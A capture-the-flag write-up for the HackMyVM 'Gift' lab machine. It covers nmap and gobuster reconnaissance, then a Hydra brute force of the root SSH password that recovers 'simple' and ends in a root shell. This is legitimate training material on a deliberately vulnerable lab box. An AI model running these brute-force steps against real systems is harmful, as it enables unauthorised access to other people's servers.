In this write-up, I will guide you through the steps I took to complete the HackMyVM - Gift CTF challenge. The objective is to gain root access to the target machine by exploiting identified vulnerabilities. Checkout the video (update this).
TL;DR
Reconnaissance
Network/Port Scanning (Nmap)
Command:
nmap -sV -sC -vv -oA gift 172.16.100.13
Explanation:
nmap: Tool used to scan network and ports to discover which services are running.
-sV: Perform version detection of services.
-sC: Scan using default scripts.
-oA: Output in filename "gift".
172.16.100.13: IP address of Gift VM on my network.
Output:
# Nmap 7.95 scan initiated Fri Sep 20 22:24:51 2024 as: nmap -sC -sV -vv -oA gift -p- 172.16.100.13
Nmap scan report for 172.16.100.13
Host is up, received conn-refused (0.012s latency).
Scanned at 2024-09-20 22:25:01 PDT for 12s
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
| 3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCwvhffyA9Z9cqVhVe0GuixD3HU4XTTTf1CQnN9PbBFckBHxypueBuI9N0WkAOvZLGKI9JkjxzxgQ5vIdzr83IoyrbUBw/nFLwRzsVhBM+JMUqSZ9OHMhg8qQpFIAcdNprgB40DgER+hMrU+yUAqwbNISQC/aE+DCdHNjNqFw6Pf2/+7bp8CbntJAxdh4DtHZAmneKy/2JGKzpJcDxU2L8B5pY9uvajkKVSDXVFe1bJZV9ZirBalgYGgke4sTz5kpIeT3CyEefJie6r7wloIH4CiWtyXDsYGMt5mD2UBCa4GDQaJO5U9F0qjYFa8YdVCOTWdyQvOlFOgqydvAl0LRf6tZKNqVOb/peNf9K8Ucrg4n+IevaGmivhyGXnwbuCuHN1QH/9dzbNbnZwXn2GYtwYdjBy6AmHRX9Jcsdorj4b/r+eCEPvFIm4ESc7qsn4ShtQr9R8fTgrWArJkfLKhr4KdwMZoifAbjrR/G/lj524dS20mbbVLdhjy/8rH/42dN0=
| 256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEK4YVSVfGAFEwIJqSel1n33seZLyN+AgGU4rUu5Xrf2LnzQmntddLtLtc1Soqu6SpOi/A6vefQzI+a867uJ3Tw=
| 256 81:ab:36:ec:b1:2b:5c:d2:86:55:12:0c:51:00:27:d7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAID5tIogpq9Eky8MaFF10Cq48d+nTRmXk0OwWl8J8CNIq
80/tcp open http syn-ack nginx
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 20 22:25:13 2024 -- 1 IP address (1 host up) scanned in 23.22 seconds
Findings:
We see that there is a web server running on port 80.
Let's check out the web server and in the background we can run gobuster to brute force web directories.
Directory Brute-forcing (Gobuster)
Command:
gobuster dir -u http://172.16.100.13 -w /SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,txt,html
Note: I have setup an alias to run gobuster inside a docker container.
Alias: alias gobuster='docker run -it --rm --name gobuster -v /home/ayush/Tools/SecLists/:/SecLists ghcr.io/oj/gobuster'
Explanation:
dir: Mode of operation indicating directory/file enumeration.
-u http://172.16.101.13: Base URL of the target web server to scan.
-w /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt: Path of word list to use.
-x php,txt,html: Search for the PHP, HTML and TXT file extensions.
Output:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.16.100.13
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 57]
Progress: 882236 / 882240 (100.00%)
===============================================================
Finished
===============================================================
Findings:
Nothing is found here.
Visiting Web Page (Port 80)
This is a normal landing page with no special features. Let's check the source code for any hints.
Source code of webpage:
The author of the box is saying that the box is really simple and there are no running services which we can exploit, and the web server only has a static page. So, the simplest way to get access to a system is brute forcing.
Brute Forcing
SSH Root Password Brute Force (Hydra)
Let's try to find the password of the root user of the box using Hydra and the rockyou wordlist.
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-20 22:33:56
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://172.16.100.13:22/
[22][ssh] host: 172.16.100.13 login: root password: simple
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-20 22:34:11
We found the password with our brute force attack and we can use it to login to the root user via SSH.
Command:
ssh root@172.16.100.13
Output:
IM AN SSH SERVER
gift:~# ls
root.txt user.txt
gift:~#
